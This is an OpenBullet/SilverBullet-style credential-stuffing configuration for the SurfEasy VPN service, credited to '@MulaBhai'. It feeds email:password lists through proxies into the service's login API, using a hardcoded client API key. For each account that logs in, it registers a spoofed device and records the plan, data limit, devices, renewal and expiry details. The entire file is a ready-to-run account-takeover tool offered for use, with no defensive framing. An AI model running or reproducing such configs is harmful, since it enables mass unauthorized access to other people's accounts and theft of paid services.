[SETTINGS]
{
  "Name": "SURFEASY VPN",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-10-15T01:47:51.9018135+06:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@MulaBhai",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "SURFEASY VPN",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": "",
  "Message": "",
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#PS FUNCTION Hash SHA1 "<PASS>" -> VAR "PS" 

#REQ REQUEST POST "https://fire-base.com/v2/subscriber_login" 
  CONTENT "{\"login\":\"<USER>\",\"password\":\"<PS>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "Accept: application/json" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Connection: close" 
  HEADER "Host: fire-base.com" 
  HEADER "SE-Client-Locale: en" 
  HEADER "SE-Client-Type: se0208" 
  HEADER "SE-Client-Version: 4.1.5" 
  HEADER "SE-Operating-System: 7.1.2" 
  HEADER "SE-Client-API-Key: 8DFB120F911E6048496BDDB081D510E9AB991EBC583775A043F824A3D0519441" 
  HEADER "SE-Platform-ID: android-x86-32" 
  HEADER "User-Agent: SurfEasy Android Client/1.0" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Login failed." 
  KEYCHAIN Success OR 
    KEY "{\"return_code\":{\"0\":\"OK" 

#RS FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h_?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "RS" 

#REQ REQUEST POST "https://fire-base.com/v2/register_device" 
  CONTENT "{\"device_hash\":\"48a0678bba4c33e6\",\"device_name\":\"SM-G934F\",\"client_type\":\"se0208\",\"mobile_advertising_id\":\"<RS>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "Accept: application/json" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Connection: close" 
  HEADER "Host: fire-base.com" 
  HEADER "SE-Client-Locale: en" 
  HEADER "SE-Client-Type: se0208" 
  HEADER "SE-Client-Version: 4.1.5" 
  HEADER "SE-Operating-System: 7.1.2" 
  HEADER "SE-Client-API-Key: 8DFB120F911E6048496BDDB081D510E9AB991EBC583775A043F824A3D0519441" 
  HEADER "SE-Platform-ID: android-x86-32" 
  HEADER "User-Agent: SurfEasy Android Client/1.0" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "the number of allowed devices has been reached." 

#DID PARSE "<SOURCE>" JSON "data.device_id" JTokenParsing=TRUE -> VAR "DID" 

#DIDI FUNCTION Hash SHA1 "<DID>" -> VAR "DIDI" 

#REQ REQUEST POST "https://fire-base.com/v2/subscriber_usage" 
  CONTENT "{\"device_id\":\"<DIDI>\",\"plan_summary\":\"true\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "Accept: application/json" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Connection: close" 
  HEADER "Host: fire-base.com" 
  HEADER "SE-Client-Locale: en" 
  HEADER "SE-Client-Type: se0208" 
  HEADER "SE-Client-Version: 4.1.5" 
  HEADER "SE-Operating-System: 7.1.2" 
  HEADER "SE-Client-API-Key: 8DFB120F911E6048496BDDB081D510E9AB991EBC583775A043F824A3D0519441" 
  HEADER "SE-Platform-ID: android-x86-32" 
  HEADER "User-Agent: SurfEasy Android Client/1.0" 

#PLAN PARSE "<SOURCE>" JSON "data.plan_summary.plan_name" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "PLAN" 

#DATA PARSE "<SOURCE>" LR "\"data_limit_unit\":\"" "\"," CreateEmpty=FALSE -> VAR "DATA" 

#DATA_LIMIT PARSE "<SOURCE>" LR ",\"data_limit\":" ",\"" CreateEmpty=FALSE -> CAP "DATA LIMIT" "" " <DATA>" 

#DEVICES PARSE "<SOURCE>" JSON "data.plan_summary.active_devices" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "ACTIVE DEVICES" 

#CYCLE PARSE "<SOURCE>" LR "\"cycle_end\":\"" "T" CreateEmpty=FALSE -> CAP "CYCLE END" 

#RENEWAL PARSE "<SOURCE>" LR ",\"auto_renewal\":" "}," CreateEmpty=FALSE -> CAP "AUTO RENEWAL" 

FUNCTION Constant "MulaBhai" -> CAP "Config By:" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "access_state\":\"expired" 
    KEY "Serial Number Does Not Exist" 

